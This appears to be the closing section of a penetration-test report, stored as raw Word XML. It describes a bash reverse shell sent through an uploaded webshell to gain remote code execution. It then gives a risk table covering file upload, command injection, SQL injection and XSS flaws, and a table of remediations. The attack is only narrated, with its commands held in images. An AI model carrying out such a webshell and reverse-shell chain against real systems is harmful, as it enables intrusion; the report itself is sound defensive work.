          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17BF416B" wp14:editId="1F3D6B08">
            <wp:extent cx="3177815" cy="434378"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="52873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3604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70A8" w14:textId="549D41E8" w:rsidR="00EF371B" w:rsidRDefault="00432D73" w:rsidP="00555C0A">
      <w:r w:rsidRPr="00432D73">
        <w:t xml:space="preserve">With the listener active, a bash reverse shell payload was URL-encoded and delivered to the target server </w:t>
      </w:r>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidRPr="00432D73">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00432D73">
        <w:t>webshell's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00432D73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00432D73">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00432D73">
        <w:t xml:space="preserve"> parameter using curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1723E4F5" w14:textId="00940A2A" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00555C0A">
      <w:r w:rsidRPr="00432D73">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A568BAE" wp14:editId="3803BB42">
            <wp:extent cx="5943600" cy="666115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="10900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211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657E" w14:textId="79FF1026" w:rsidR="00432D73" w:rsidRDefault="00432D73" w:rsidP="00555C0A">
      <w:r w:rsidRPr="00432D73">
        <w:t xml:space="preserve">The payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00432D73">
        <w:t>successfully</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00432D73">
        <w:t xml:space="preserve"> executed in the background, and a reverse connection was received on the attacker's listener, confirming Remote Code Execution and a system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6B77A5" w14:textId="6991D0D8" w:rsidR="00432D73" w:rsidRDefault="00037208" w:rsidP="00555C0A">
      <w:r w:rsidRPr="00037208">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A05F079" wp14:editId="6CE4E9E2">
            <wp:extent cx="5943600" cy="2198370"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18178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841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E330" w14:textId="77777777" w:rsidR="00037208" w:rsidRDefault="00037208" w:rsidP="00555C0A"/>
    <w:p w14:paraId="5ED5D1C6" w14:textId="5E4E0D80" w:rsidR="00EF371B" w:rsidRPr="000A5038" w:rsidRDefault="00EF371B" w:rsidP="00555C0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A5038">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.6 Risk Rating Summary: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F371B" w:rsidRPr="00EF371B" w14:paraId="01D64D6E" w14:textId="77777777" w:rsidTr="00EF3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4249DB4E" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96AF8">
            <w:r w:rsidRPr="00EF371B">
              <w:lastRenderedPageBreak/>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="266F25C4" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96A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71B">
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11088F4C" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96A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71B">
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="106E07D7" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96A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71B">
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="682F838B" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96A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71B">
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w:rsidRPr="00EF371B" w14:paraId="6108EC93" w14:textId="77777777" w:rsidTr="00EF3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156537F3" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96AF8">
            <w:r w:rsidRPr="00EF371B">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67202797" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>Unrestricted File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="579BB32E" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>profile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B35D810" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BAE83F4" w14:textId="54C61FA0" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w:rsidRPr="00EF371B" w14:paraId="0A781C0F" w14:textId="77777777" w:rsidTr="00EF3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E68A170" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96AF8">
            <w:r w:rsidRPr="00EF371B">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F061DF3" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28B7F26F" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>/admin/tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33DC493E" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24F29CDA" w14:textId="6855255C" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w:rsidRPr="00EF371B" w14:paraId="6061F6E0" w14:textId="77777777" w:rsidTr="00EF3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3CD91C27" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96AF8">
            <w:r w:rsidRPr="00EF371B">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7019E08D" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BC88001" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>login</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>, /directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45E366BA" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FE8C889" w14:textId="4E6B2E9C" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w:rsidRPr="00EF371B" w14:paraId="58FD11DD" w14:textId="77777777" w:rsidTr="00EF3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948D7AD" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96AF8">
            <w:r w:rsidRPr="00EF371B">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A86DBB1" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52A6F8F4" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>feedback</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AA998CE" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>8.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="075813D2" w14:textId="5CBDA65D" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w14:paraId="29F06BBD" w14:textId="77777777" w:rsidTr="00EF3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7FA33C6C" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96AF8">
            <w:r w:rsidRPr="00EF371B">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34520614" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>Reflected XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49BFF712" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>search</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64764427" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>7.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28218B79" w14:textId="1F6CCCC2" w:rsidR="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00B96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71B">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="146F1C8C" w14:textId="7F74E388" w:rsidR="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00EF371B"/>
    <w:p w14:paraId="7003585B" w14:textId="6D4AAF71" w:rsidR="00EF371B" w:rsidRPr="000A5038" w:rsidRDefault="00EF371B" w:rsidP="00EF371B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A5038">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.7 Recommendations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F371B" w:rsidRPr="00EF371B" w14:paraId="6B0E31E4" w14:textId="77777777" w:rsidTr="00EF3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FF0458C" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A50">
            <w:r w:rsidRPr="00EF371B">
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FA8D55D" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A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71B">
              <w:t>Fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w:rsidRPr="00EF371B" w14:paraId="608E5443" w14:textId="77777777" w:rsidTr="00EF3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A9CE141" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A50">
            <w:r w:rsidRPr="00EF371B">
              <w:t>File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F7A43F9" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A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71B">
              <w:t>Whitelist extensions (.jpg, .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>png</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t xml:space="preserve"> only), validate MIME type, use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>secure_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>filename</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>), store outside web root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w:rsidRPr="00EF371B" w14:paraId="7174D838" w14:textId="77777777" w:rsidTr="00EF3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F438001" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A50">
            <w:r w:rsidRPr="00EF371B">
              <w:t>Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B929541" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A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71B">
              <w:t xml:space="preserve">Never pass user input to shell — use subprocess with list </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t xml:space="preserve"> and no shell=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w:rsidRPr="00EF371B" w14:paraId="19D9959A" w14:textId="77777777" w:rsidTr="00EF3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A97D50E" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A50">
            <w:r w:rsidRPr="00EF371B">
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DD5458B" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A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71B">
              <w:t>Use parameterized queries / prepared statements — never format SQL strings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF371B" w14:paraId="03C0A758" w14:textId="77777777" w:rsidTr="00EF3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B4CFFF3" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRPr="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A50">
            <w:r w:rsidRPr="00EF371B">
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6403E04C" w14:textId="77777777" w:rsidR="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="002B0A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71B">
              <w:t xml:space="preserve">Use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>html.escape</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t xml:space="preserve">() or Jinja2's </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>{{ var</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t xml:space="preserve"> }} auto-escaping — never </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>render_template_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00EF371B">
              <w:t>f"...{input}...")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69A010DC" w14:textId="61DABF78" w:rsidR="00EF371B" w:rsidRDefault="00EF371B" w:rsidP="00EF371B"/>
    <w:sectPr w:rsidR="00EF371B" w:rsidSect="00B72A92">
      <w:footerReference w:type="default" r:id="rId55"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgBorders w:offsetFrom="page">
        <w:top w:val="single" w:sz="4" w:space="24" w:color="E97132" w:themeColor="accent2"/>
        <w:left w:val="single" w:sz="4" w:space="24" w:color="E97132" w:themeColor="accent2"/>
        <w:bottom w:val="single" w:sz="4" w:space="24" w:color="E97132" w:themeColor="accent2"/>
        <w:right w:val="single" w:sz="4" w:space="24" w:color="E97132" w:themeColor="accent2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E83F0" w14:textId="77777777" w:rsidR="00DC00EA" w:rsidRDefault="00DC00EA" w:rsidP="00B72A92">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="26715127" w14:textId="77777777" w:rsidR="00DC00EA" w:rsidRDefault="00DC00EA" w:rsidP="00B72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49866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00D5B2" w14:textId="4247C36D" w:rsidR="00B72A92" w:rsidRDefault="00B72A9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C6DE90" w14:textId="77777777" w:rsidR="00B72A92" w:rsidRDefault="00B72A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80B0A" w14:textId="77777777" w:rsidR="00DC00EA" w:rsidRDefault="00DC00EA" w:rsidP="00B72A92">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C33B7D0" w14:textId="77777777" w:rsidR="00DC00EA" w:rsidRDefault="00DC00EA" w:rsidP="00B72A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3C2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="05D2CD66"/>
    <w:lvl w:ilvl="0" w:tplc="A5DC8E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8423F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7088A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1525D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D440D74"/>
    <w:lvl w:ilvl="0" w:tplc="A5DC8E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BC1E01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64BE3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028750">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="141852176">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2056805715">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="936213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4FD"/>
    <w:rsid w:val="00037208"/>
    <w:rsid w:val="000A5038"/>
    <w:rsid w:val="001D7C3D"/>
    <w:rsid w:val="00222DEC"/>
    <w:rsid w:val="002B7B52"/>
    <w:rsid w:val="003179E7"/>
    <w:rsid w:val="00394DC9"/>
    <w:rsid w:val="00432D73"/>
    <w:rsid w:val="00555C0A"/>
    <w:rsid w:val="0055697C"/>
    <w:rsid w:val="00576EE0"/>
    <w:rsid w:val="005E6F1E"/>
    <w:rsid w:val="00652F2E"/>
    <w:rsid w:val="006931CC"/>
    <w:rsid w:val="006B1D16"/>
    <w:rsid w:val="00724BA4"/>
    <w:rsid w:val="007D22CA"/>
    <w:rsid w:val="008830BC"/>
    <w:rsid w:val="0089361D"/>
    <w:rsid w:val="00895CB4"/>
    <w:rsid w:val="008A54FD"/>
    <w:rsid w:val="009B73CB"/>
    <w:rsid w:val="009D0779"/>
    <w:rsid w:val="009E35BF"/>
    <w:rsid w:val="00AD1E97"/>
    <w:rsid w:val="00AD6B80"/>
    <w:rsid w:val="00B72A92"/>
    <w:rsid w:val="00CD5AE9"/>
    <w:rsid w:val="00CF27BB"/>
    <w:rsid w:val="00D359F0"/>
    <w:rsid w:val="00D670CF"/>
    <w:rsid w:val="00DC00EA"/>
    <w:rsid w:val="00DE0C67"/>
    <w:rsid w:val="00E9458D"/>
    <w:rsid w:val="00EF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F69CE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9D406FEB-5D03-430C-880A-C6D853FAB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58D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008A5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4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1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2">
    <w:name w:val="Grid Table 1 Light Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="006B1D16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2">
    <w:name w:val="Grid Table 2 Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="00576EE0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NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00B72A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72A92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72A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2A92"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B72A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2A92"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B72A9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16A86C0-916D-4A28-BDDB-DEE2649BB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28</Pages>
  <Words>1783</Words>
  <Characters>10165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OMAR AL SHIKH KHALIL</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-07T17:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-09T21:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>